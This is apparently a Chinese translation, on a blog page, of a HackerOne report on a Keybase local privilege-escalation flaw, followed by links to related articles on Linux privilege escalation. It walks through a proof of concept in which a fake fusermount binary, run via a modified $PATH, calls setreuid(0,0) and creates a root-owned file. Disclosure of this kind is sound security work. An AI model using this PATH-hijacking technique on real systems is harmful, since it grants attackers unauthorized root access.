linux漏洞奖金,价值5000美金基于keybase缺陷的Linux提权漏洞

最新推荐文章于 2022-05-12 10:02:31 发布
最新推荐文章于 2022-05-12 10:02:31 发布
阅读量167 收藏
点赞数
文章标签: linux漏洞奖金

cebb0b2ba50837c94cb5a101beba9fa4.png

18b34b37819ef8b84e51eb7f444d42ae.png是一个开源公钥库,用于提供端对端的加密的通讯协作服务。

cdf155d4c85ad27bf3f36b8f60c46d36.png是一个运行权限为root的二进制文件。而且

3c4d43d97de9ed7afb124a7601458b76.png会使用相对路径调用fusermount命令,这其中就涉及到$PATH的值。作者经过研究发现,本地低权限用户可通过更改$PATH的值来诱导

e9db2c8529358c6df336b698cd7d6597.png以root权限执行攻击者自定义的恶意文件。

近期,hackerone公开了这个基于

eecf3f0d0791c2550cbe098bd167bf3a.png的提权漏洞,发现者获得了5000美金的奖励。

环境

CentOS Linux release 7.4.1708 (Core)3.10.0-693.17.1.el7.x86_64

RPM infoName : keyba se

Version : 2.8.0.20181017144746.3efc4cbf3c

Release : 1

Architecture: x86_64

Install Date: Mon 22 Oct 2018 05:30:36 PM EDT

Group : Unspecified

Size : 273302678

License : BSD

Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7

Source RPM : keyba se-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm

Build Date : Wed 17 Oct 2018 10:54:47 AM EDT

Build Host : 6ae61e160e87

Relocations : (not relocatable)

Summary : Keyba se command line client

Desc ription :

Keyba se command line client

以上为具体系统信息和软件版本,这次演示使用了一个低权限用户user1

利用步骤

第一步,展示低权限用户user1[user1@localhost woot]$ id

uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

第二步,编写一个自定义创建文件的脚本fusermount.c。这个脚本将以root身份创建/w00t目录,当然它也可以行任意命令cat >fusermount.c<

#include

#include

#include

#include

int main(int argc, char **argv)

{

setreuid(0,0);

system("/usr/bin/touch /w00t");

return(0);

}

EOF

第三步,编译fusermount.c,输出为fusermount二进制文件,恶意替代正常的fusermount命令gcc -Wall fusermount.c -o fusermount

第四步,/w00t文件夹原先并不存在[user1@localhost woot]$ ls -ld /w00t

ls: cannot access /w00t: No such file or directory

第五步,在path环境变量前面加上一个点(相当于当前目录),然后执行

4451de3f732435ca69c382ec6db2c041.png,它就会以root权限执行恶意的fusermount二进制文件。

bb41c8811977a7c36031b0b9346a033e.png

第六步,输入control+c,中断应用

fe39ebdf2616a04a79b294262323ba08.png

第七步,现在/w00t文件夹已存在[user1@localhost woot]$ ls -ld /w00t

-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t

[user1@localhost woot]$

影响

这个漏洞可非法提升攻击者权限到root,会影响系统的机密性、完整性和可用性。本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:https://hackerone.com/reports/426944

weixin_39620001
关注
Linux DirtyPipe内核提权漏洞(CVE-2022-0847)复现与分析
SHELLCODE_8BIT的博客
10-27 2115
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”
价值$75000Linux漏洞
Listen2You的博客
05-08 240
黑客组织利用 Cacti“Network Weathermap”插件中一个存在 5 年之久的漏洞,在 Linux 服务器上安装了 Monero 矿工,赚了近 75,000 美元。来自美国安全公司趋势科技的专家表示,他们有证据证明这些攻击与过去发生在 Jenkins 服务器上的攻击有关:黑客组织利用 CVE-2017-1000353 漏洞在 Jenkins 设备上安装 Moner 矿工,获得了约 3...
谷歌发布 Linux 内核提权漏洞奖励计划,综合奖金最高超30万美元
smellycat000的专栏
11-03 285
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士谷歌在博客中表示推出Linux 内核漏洞奖励计划,为其三个月(截止到当地时间2022年1月31日)。如研究员能在实验环境中通过已修复漏洞...
linux设置环境变量_Linux 提权的各种姿势总结
weixin_39929635的博客
10-23 454
本文作者:VoltCary(信安之路 2019 年度首次投稿)获得奖励:免费邀请加入信安之路知识星球+邀请加入信安之路核心群+90sec 论坛邀请码这篇讲一些关于 Linux 提权的方法,也是参考网上的一些提权方式,对于刚接触 Linux 提权的伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂的思路去写,希望能帮到热爱学习的朋友,先写这些提权方法。若有更好的提权方式,欢迎老哥们在...
Linux 提权的各种姿势总结
weixin_45116657的博客
11-21 5423
友情链接:Linux 提权的各种姿势总结 目录 提权方式总结 1、利用内核栈溢出提权 1.1> 信息收集 1.2> linux-exploit-suggester-2 2、明文 root 密码提权 3、密码复用 4、sudo 滥用 (1)su (2)awk (3)man (4)curl 5、su root 被禁止解决 6、计划任务 (1)重写pyth...
CentOS 7系统配置sudo策略(附sudo提权演示
zz_strive_2012的专栏
07-24 903
https://www.freebuf.com/articles/system/243526.html 一、操作目的和应用场景 某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的权限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户权限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。 二、平台及工具版
通信与网络中的Atmel推出售价69美元的基于Linux的32位AVR网络处理器套件
12-04
Atmel Corporation发布了一款名为AVR32网络网关设计套件的产品,这款套件以69美元的亲民价格面向市场,展示了基于Linux的32位AVR32技术在通信与网络处理上的潜力。该套件的核心是32位AT32AP7000应用处理器,它配备了...
2010年中国Linux市场价值将达5100万美元.pdf
09-06
《2010年中国Linux市场价值将达到5100万美元》 随着信息技术的快速发展,操作系统作为计算机硬件与软件之间的桥梁,其重要性日益凸显。在中国,Linux作为一种开放源代码的操作系统,正在逐步受到市场的青睐。据市场...
AMX推出基于Wind River Linux的标准化Modero系列触摸屏面板
11-25
AMX在与风河公司达成此次合作关系前,进行了一项全面的投资回报率(RIO)分析,结果显示采用Wind River Linux替代自行开发Linux平台,预计可节省近200万美元的成本。此外,采用Wind River Linux平台进行标准化产品...
基于Linux的10大半自动机器人
08-18
【基于Linux的10大半自动机器人】这篇文章探讨了如何Linux操作系统正逐渐应用于各种类型的机器人技术,包括地面机器人、无人机和自主水下航行器。这些机器人不仅展现了Linux的多功能性,也展示了开源软件在机器人...
基于Linux的平板电脑——HELIUM 2100.pdf
09-07
"基于Linux的平板电脑——HELIUM 2100" HELIUM 2100是一款基于Linux操作系统的平板电脑,由纽约ELEMENt Computer公司开发。该产品采用旋转式显示屏设计,屏幕可以旋转360度,用户可以将其放在桌面上使用,也可以...
CVE-2022-0847Linux内核提权漏洞
qq_49091880的博客
04-12 4545
步骤有点简略,各位师傅见谅
漏洞总结-linux提权漏洞
smart的博客
09-02 6694
漏洞总结-linux提权漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以提权成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 kernel 4.15.0-20-generic Ubuntu 19.04 kernel 5.0.0-15-generic Ubuntu Mate 18.04.2 kernel 4.1
linux 列目录漏洞,Linux sudo漏洞(CVE-2017-1000367)复现和利用思路分析
weixin_35618196的博客
05-05 841
* 本文作者:李丽,本文属FreeBuf原创奖励计划,未经许可禁止转载漏洞背景在今年5.30日linux sudo被爆出存在安全漏洞,sudo版本是1.8.20以及之前的版本都有可能会受到漏洞的影响,在开启selinux的情况和普通用户在sudoer者中,可以使普通用户造成覆盖任意文件,造成权限的提升。漏洞分析出现漏洞主要在sudo中的/src/ttyname.c中的char *get_procc...
CentOS Linux release 7.4.1708 (Core)操作系统安全加固
weixin_40133285的博客
05-12 2206
CentOS Linux release 7.4.1708 (Core)操作系统安全加固 基线策略 口令复杂度 登录失败处理 操作审计 cat /etc/pam.d/system-auth cat /etc/login.defs PASS_MAX_DAYS 99999 cat /etc/pam.d/sshd cat /etc/passwd useradd user cat /etc/ssh/sshd_config PermitRootLogin no auditctl -s cat /etc/rsy
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析
panhewu9919的博客
04-11 1656
漏洞作者在kctf环境上成功完成了提权和逃逸,并获得了 google kCTF vulnerability reward program 项目奖励的 31,337 美金的奖励(该项目对能从有nsjail 沙箱的Linux内核提权,奖励31,337 到 91,337 美元,由于syzbot平台上有人比作者早6天先发现了这个漏洞,作者并非首次发现该漏洞,只是完成了kctf提权,便获得了最低奖金)。 影响版本:Linux-v5.1~v5.16.2。5.1-rc1 引入漏洞Linux-v5.16.2已修补 ,由
基于java的人事管理系统设计与实现.docx
09-13
基于java的人事管理系统设计与实现.docx
Spring Boot微博后端系统(spring-boot-tucao-weibo).zip
最新发布
09-13
这是一个基于Spring Boot框架开发的微博后端系统,实现前后端分离,使得后台可以独立开发和调试。该系统采用Vue实现前端界面,并提供了丰富的功能,如发布微博、评论、点赞等。技术栈包括Spring Boot、Spring Data JPA和Stomp(WebSocket)。项目提供开发环境和生产环境的运行方式,支持H2内存数据库和mySQL数据库。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看reADME.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值